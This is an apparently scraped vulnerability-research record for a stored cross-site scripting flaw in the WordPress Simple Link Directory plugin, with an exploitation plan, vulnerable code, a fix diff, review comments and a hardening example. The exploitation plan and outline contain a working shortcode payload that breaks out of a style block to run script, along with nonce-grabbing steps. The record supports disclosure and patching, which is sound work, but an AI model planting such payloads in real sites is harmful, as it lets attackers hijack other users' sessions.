[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$flhzscQtTaZHna9HyHj78lPOoAim0-oDmEMC59y6HjV8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-7209","simple-link-directory-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","Simple Link Directory \u003C= 8.9.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The Simple Link Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `qcopd-directory` shortcode in all versions up to, and including, 8.9.2. This is due to insufficient input sanitization and output escaping on user supplied attributes such as `title_font_size`. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","simple-link-directory",null,"\u003C=8.9.2","8.9.4","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-01 14:45:40","2026-05-02 03:36:43",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9a7ca5f6-89c0-49ce-9aef-2208365c6151?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fjs\u002Fqcopd-admin-common.js","embed\u002Fcss\u002Fembed-form.css","qc-op-directory-main.php","qc-op-directory-shortcodes.php","readme.txt","templates\u002Fsimple\u002Ftemplate.php","templates\u002Fstyle-1\u002Ftemplate.php","templates\u002Fstyle-16\u002Ftemplate.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-7209\n\n## 1. Vulnerability Summary\nThe **Simple Link Directory** plugin (\u003C= 8.9.2) is vulnerable to **Stored Cross-Site Scripting (XSS)** via the `[qcopd-directory]` shortcode. Specifically, several attributes such as `title_font_size`, `subtitle_font_size`, `title_line_height`, and `subtitle_line_height` are passed directly into CSS blocks via the WordPress function `wp_add_inline_style` without sufficient sanitization or escaping. This allows an authenticated attacker (Contributor level or higher) to inject arbitrary HTML and JavaScript by breaking out of the `\u003Cstyle>` context.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** The standard WordPress post\u002Fpage editor.\n*   **Shortcode:** `[qcopd-directory]`\n*   **Vulnerable Parameter:** Shortcode attributes, specifically `title_font_size`.\n*   **Authentication Level:** Authenticated (Contributor+). Contributors can create posts (but not pages) and use shortcodes in them, and can only submit a post for review rather than publish it. 
However, the XSS will execute for any user (including Administrators) who previews the draft or views the published post. Note that a Contributor does not hold the `unfiltered_html` capability, so WordPress runs the saved post content through `wp_kses_post()`, which strips the `\u003C\u002Fstyle>` and `\u003Cscript>` tags out of the payload in section 5 before it is stored. The script-executing form of that payload therefore persists only when saved by an account with `unfiltered_html` (Administrators, and Editors on single-site installs); from a plain Contributor account, what reaches the `\u003Cstyle>` block is a CSS injection unless a payload that survives kses is found.\n*   **Precondition:** At least one \"Link Directory\" (custom post type `sld`) must exist for the shortcode to process the template files containing the vulnerability.\n\n## 3. Code Flow\n1.  **Registration:** The shortcode is registered in `qc-op-directory-shortcodes.php`:\n    ```php\n    add_shortcode('qcopd-directory', 'qcopd_directory_full_shortcode');\n    ```\n2.  **Processing:** `qcopd_directory_full_shortcode` calls `show_qcopd_full_list($atts)`.\n3.  **Extraction:** `show_qcopd_full_list` uses `extract(shortcode_atts(...))` to populate variables like `$title_font_size` and `$style`.\n4.  **Template Loading:** Depending on the `style` attribute (default: `simple`), the plugin includes a template file (e.g., `templates\u002Fsimple\u002Ftemplate.php`).\n5.  **Vulnerable Sink:** Inside `templates\u002Fsimple\u002Ftemplate.php`, the `$title_font_size` variable is used to construct a CSS string for `wp_add_inline_style`:\n    ```php\n    $customcss = '';\n    $customcss .= '#list-item-'.$listId .'-'. get_the_ID().'.simple ul li a{';\n    if($title_font_size!=''){\n        $customcss .= 'font-size:'.$title_font_size.';';\n    }\n    \u002F\u002F ...\n    wp_add_inline_style( 'sld-css-simple', $customcss );\n    ```\n6.  **Rendering:** WordPress outputs the contents of `$customcss` inside a `\u003Cstyle>` block. An attacker can use `\u003C\u002Fstyle>` to close the block and inject a `\u003Cscript>` tag. `wp_add_inline_style()` itself only looks for `\u003C\u002Fstyle>` in order to raise a `_doing_it_wrong()` notice and strip a complete `\u003Cstyle>...\u003C\u002Fstyle>` wrapper; a bare closing tag with no opening tag passes through to the output unchanged.\n\n## 4. Nonce Acquisition Strategy\nSince this is an authenticated Stored XSS vulnerability performed via the WordPress post editor, the attacker needs a standard WordPress **post nonce** and **cookie** to create\u002Fedit a post.\n1.  Log in as a **Contributor**.\n2.  Navigate to `wp-admin\u002Fpost-new.php`.\n3.  Extract the `_wpnonce` from the HTML form:\n    *   `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n4.  
Use this nonce in the `http_request` to save the post containing the malicious shortcode.\n\n## 5. Exploitation Strategy\n1.  **Identify Target:** Ensure at least one `sld` (Link Directory) post exists.\n2.  **Craft Payload:** Create a shortcode attribute that breaks the CSS and style tag:\n    *   `title_font_size='20px; } \u003C\u002Fstyle>\u003Cscript>alert(document.domain)\u003C\u002Fscript>'`\n3.  **Inject Shortcode:** Create a new page\u002Fpost with the following content:\n    *   `[qcopd-directory style=\"simple\" title_font_size='20px; } \u003C\u002Fstyle>\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n4.  **Trigger Execution:** Access the permalink of the post (or the preview URL if only saved as a draft).\n\n## 6. Test Data Setup\nBefore exploitation, the environment must be prepared using `wp-cli`:\n1.  **Create Contributor User:**\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n    ```\n2.  **Create a Link Directory (sld) post:** (The shortcode requires at least one list to exist to trigger the template rendering logic).\n    ```bash\n    wp post create --post_type=sld --post_title=\"Test Directory\" --post_status=publish\n    ```\n\n## 7. Expected Results\nWhen the page containing the shortcode is loaded:\n1.  The WordPress engine processes the `[qcopd-directory]` shortcode.\n2.  The plugin enqueues the `sld-css-simple` stylesheet.\n3.  The plugin calls `wp_add_inline_style` with the payload.\n4.  The HTML response will contain:\n    ```html\n    \u003Cstyle id='sld-css-simple-inline-css' type='text\u002Fcss'>\n    ... font-size:20px; } \u003C\u002Fstyle>\u003Cscript>alert(document.domain)\u003C\u002Fscript>;}\n    \u003C\u002Fstyle>\n    ```\n5.  The browser executes `alert(document.domain)`.\n\n## 8. Verification Steps\n1.  **Verify Post Content:** Use `wp-cli` to check the stored shortcode:\n    ```bash\n    wp post get [POST_ID] --field=post_content\n    ```\n2.  
**Verify Source Output:** Use `http_request` to fetch the page and grep for the broken style tag:\n    ```bash\n    http_request GET \"http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]\" | grep \"\u003C\u002Fstyle>\u003Cscript>alert\"\n    ```\n\n## 9. Alternative Approaches\n*   **Other Attributes:** If `title_font_size` is sanitized in a specific environment, try `subtitle_font_size`, `title_line_height`, or `subtitle_line_height` across different styles (e.g., `style=\"style-1\"`).\n*   **Other Styles:** The vulnerability exists in multiple template files:\n    *   `templates\u002Fsimple\u002Ftemplate.php`\n    *   `templates\u002Fstyle-1\u002Ftemplate.php`\n    *   `templates\u002Fstyle-16\u002Ftemplate.php`\n*   **CSS-only payloads:** If `\u003Cscript>` is filtered (as `wp_kses_post()` does for accounts without `unfiltered_html`), `javascript:` URLs inside CSS `url()` are not executed by current browsers, so what remains in this sink is CSS injection rather than script execution: closing the rule with `}` and adding rules that load attacker-controlled resources via `url()` or that restyle the page.","The Simple Link Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the [qcopd-directory] shortcode. Authenticated attackers with Contributor-level permissions or higher can inject arbitrary scripts into pages by using crafted shortcode attributes, such as title_font_size, which are inserted into inline CSS blocks without sanitization or escaping.","\u002F* templates\u002Fsimple\u002Ftemplate.php lines 53-62 *\u002F\n\t\t\u003C?php if( $style == \"simple\" ): \n\t\t\t$customcss = '';\n\t\t\t$customcss .= '#list-item-'.$listId .'-'. 
get_the_ID().'.simple ul li a{';\n\t\t\tif($title_font_size!=''){\n\t\t\t\t$customcss .= 'font-size:'.$title_font_size.';';\n\t\t\t}\n\t\t\tif($title_line_height!=''){\n\t\t\t\t$customcss .= 'line-height:'.$title_line_height.';';\n\t\t\t}\n\t\t\t$customcss .= '}';\n\t\t\twp_add_inline_style( 'sld-css-simple', $customcss );\n\t\t?>\n\n---\n\n\u002F* templates\u002Fstyle-1\u002Ftemplate.php lines 105-122 *\u002F\n\t\t\u003C?php if( $style == \"style-1\" ) : \n\t\t\n\t\t$customcss = '';\n\t\t$customcss .= '#qcopd-list-'.$listId .'-'. get_the_ID().'.style-1 .ca-menu li .ca-main {';\n\t\tif($title_font_size!=''){\n\t\t\t$customcss .= 'font-size:'.$title_font_size.' !important;';\n\t\t}\n\t\tif($title_line_height!=''){\n\t\t\t$customcss .= 'line-height:'.$title_line_height.' !important;';\n\t\t}\n\t\t$customcss .= '}';\n\t\t$customcss .= '#qcopd-list-'. $listId .'-'. get_the_ID().'.style-1 .ca-menu li .ca-sub {';\n\t\tif($subtitle_font_size!=''){\n\t\t\t$customcss .= 'font-size:'. $subtitle_font_size.' !important;';\n\t\t}\n\t\tif($subtitle_line_height!=''){\n\t\t\t$customcss .= 'line-height:'. $subtitle_line_height.'!important;';\n\t\t}\n\t\t$customcss .= '}';\n\t\twp_add_inline_style( 'sld-css-style-1', $customcss );\n\t\t?>","--- templates\u002Fsimple\u002Ftemplate.php\n+++ templates\u002Fsimple\u002Ftemplate.php\n@@ -55,10 +55,10 @@\n \t\t\t$customcss = '';\n \t\t\t$customcss .= '#list-item-'.$listId .'-'. 
get_the_ID().'.simple ul li a{';\n \t\t\tif($title_font_size!=''){\n-\t\t\t\t$customcss .= 'font-size:'.$title_font_size.';';\n+\t\t\t\t$customcss .= 'font-size:'.esc_attr($title_font_size).';';\n \t\t\t}\n \t\t\tif($title_line_height!=''){\n-\t\t\t\t$customcss .= 'line-height:'.$title_line_height.';';\n+\t\t\t\t$customcss .= 'line-height:'.esc_attr($title_line_height).';';\n \t\t\t}\n \t\t\t$customcss .= '}';\n \t\t\twp_add_inline_style( 'sld-css-simple', $customcss );\n--- templates\u002Fstyle-1\u002Ftemplate.php\n+++ templates\u002Fstyle-1\u002Ftemplate.php\n@@ -107,20 +107,20 @@\n \t\t$customcss = '';\n \t\t$customcss .= '#qcopd-list-'.$listId .'-'. get_the_ID().'.style-1 .ca-menu li .ca-main {';\n \t\tif($title_font_size!=''){\n-\t\t\t$customcss .= 'font-size:'.$title_font_size.' !important;';\n+\t\t\t$customcss .= 'font-size:'.esc_attr($title_font_size).' !important;';\n \t\t}\n \t\tif($title_line_height!=''){\n-\t\t\t$customcss .= 'line-height:'.$title_line_height.' !important;';\n+\t\t\t$customcss .= 'line-height:'.esc_attr($title_line_height).' !important;';\n \t\t}\n \t\t$customcss .= '}';\n \t\t$customcss .= '#qcopd-list-'. $listId .'-'. get_the_ID().'.style-1 .ca-menu li .ca-sub {';\n \t\tif($subtitle_font_size!=''){\n-\t\t\t$customcss .= 'font-size:'. $subtitle_font_size.' !important;';\n+\t\t\t$customcss .= 'font-size:'.esc_attr($subtitle_font_size).' !important;';\n \t\t}\n \t\tif($subtitle_line_height!=''){\n-\t\t\t$customcss .= 'line-height:'. $subtitle_line_height.'!important;';\n+\t\t\t$customcss .= 'line-height:'.esc_attr($subtitle_line_height).'!important;';\n \t\t}\n \t\t$customcss .= '}';\n \t\twp_add_inline_style( 'sld-css-style-1', $customcss );","1. Obtain Contributor-level credentials (or higher) to a WordPress site using the Simple Link Directory plugin.\n2. Ensure at least one 'Link Directory' (sld post type) exists, as the vulnerable template logic only triggers when a directory list is being rendered.\n3. 
Create or edit a WordPress post and insert the [qcopd-directory] shortcode.\n4. Set a malicious payload for the 'title_font_size' (or other similar font\u002Fheight attributes) that closes the CSS block and style tag, then executes arbitrary JavaScript. Payload example: [qcopd-directory style=\"simple\" title_font_size=\"20px; } \u003C\u002Fstyle>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"]\n5. Save the post as a draft or publish it. The XSS will execute for any user (including administrators) who previews or views the post, allowing the attacker to potentially capture cookies or perform actions on behalf of the victim.","gemini-3-flash-preview","2026-05-04 17:21:48","2026-05-04 17:22:22",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","8.9.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsimple-link-directory\u002Ftags\u002F8.9.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsimple-link-directory.8.9.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsimple-link-directory\u002Ftags\u002F8.9.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsimple-link-directory.8.9.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsimple-link-directory\u002Ftags"]
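Review bot: in the templates/simple/template.php hunk, `esc_attr()` on `$title_font_size` and `$title_line_height` stops the `</style>` breakout (the entities it emits are not decoded inside a `<style>` element) but does not constrain the values to CSS lengths: `}`, `;`, `:`, `(` and `url(` all pass through, so a Contributor can still append arbitrary rules to the inline stylesheet. Validate the attribute instead, e.g. `if ( preg_match( '/^\d+(\.\d+)?(px|em|rem|%)?$/', $title_font_size ) )`, or pass the declaration through `safecss_filter_attr( 'font-size:' . $title_font_size )` and drop it when the result is empty.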
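Review bot: in the templates/style-1/template.php hunk the subtitle line-height line keeps `.'!important;'` with no space before `!important` while the other three declarations use `' !important;'`; the CSS still parses, but the fix is a good moment to make the four lines consistent. The same validation point as for the simple template applies here: `esc_attr()` blocks the tag breakout but leaves `}` and `url(` usable, so the four attributes should be checked against a CSS-length pattern or run through `safecss_filter_attr()`. Also, templates/style-16/template.php is listed among the patched files but has no hunk in this diff; confirm it received the same change.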
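The vulnerable concatenation from `templates/simple/template.php` beside a hardened builder that accepts only a CSS length, both run against the advisory's payload, as an added example that is not the plugin's own code. The function names `sld_build_css_vulnerable`, `sld_css_length`, `sld_build_css_hardened`, `render_inline_style` and `has_style_breakout` are assumptions made for this example, and `render_inline_style` only mimics the `<style>` wrapper that `WP_Styles::print_inline_style()` emits around data passed to `wp_add_inline_style()`.

```php
<?php
// Added example, not plugin code: the unescaped CSS concatenation from
// templates/simple/template.php next to a hardened builder that accepts
// only a CSS length, both run against the payload from the advisory.
// Function names below are assumptions made for this example.

// Mirrors the vulnerable template logic: attribute values go into the
// stylesheet as-is.
function sld_build_css_vulnerable(string $listId, int $postId, array $atts): string
{
    $customcss = '#list-item-' . $listId . '-' . $postId . '.simple ul li a{';
    if ($atts['title_font_size'] !== '') {
        $customcss .= 'font-size:' . $atts['title_font_size'] . ';';
    }
    if ($atts['title_line_height'] !== '') {
        $customcss .= 'line-height:' . $atts['title_line_height'] . ';';
    }
    return $customcss . '}';
}

// Allow-list validator: a number with an optional length unit, nothing else.
// Returns '' for anything that does not match, so '}', ';', '<' or 'url('
// can never reach the <style> block.
function sld_css_length(string $value): string
{
    $value = trim($value);
    return preg_match('/^\d+(\.\d+)?(px|em|rem|%)?$/', $value) === 1 ? $value : '';
}

// Same builder with the validator applied before concatenation.
function sld_build_css_hardened(string $listId, int $postId, array $atts): string
{
    $size   = sld_css_length($atts['title_font_size']);
    $height = sld_css_length($atts['title_line_height']);
    $customcss = '#list-item-' . $listId . '-' . $postId . '.simple ul li a{';
    if ($size !== '') {
        $customcss .= 'font-size:' . $size . ';';
    }
    if ($height !== '') {
        $customcss .= 'line-height:' . $height . ';';
    }
    return $customcss . '}';
}

// Mimics the <style> wrapper WP_Styles::print_inline_style() puts around
// the data handed to wp_add_inline_style().
function render_inline_style(string $handle, string $css): string
{
    return "<style id='" . $handle . "-inline-css'>\n" . $css . "\n</style>\n";
}

// Reports whether a </style> closes the block early and a <script> follows,
// i.e. whether the markup would execute as the advisory describes.
function has_style_breakout(string $html): bool
{
    return preg_match('#</style>\s*<script>#i', $html) === 1;
}

// Constructed input: the attribute values the advisory's shortcode yields.
$atts = [
    'title_font_size'   => '20px; } </style><script>alert(document.domain)</script>',
    'title_line_height' => '1.4',
];

$vulnerable = render_inline_style('sld-css-simple', sld_build_css_vulnerable('7', 42, $atts));
$hardened   = render_inline_style('sld-css-simple', sld_build_css_hardened('7', 42, $atts));

printf("vulnerable template breaks out of <style>: %s\n", has_style_breakout($vulnerable) ? 'yes' : 'no');
printf("hardened builder breaks out of <style>:    %s\n", has_style_breakout($hardened) ? 'yes' : 'no');
echo $hardened;
```

Run it with `php example.php`. `sld_css_length()` deliberately rejects rather than escapes: a font-size attribute has no legitimate reason to contain anything but a number and a unit, so the allow-list also removes the CSS-injection residue that `esc_attr()` alone leaves behind, and the hardened output for the payload above carries only the valid `line-height` declaration.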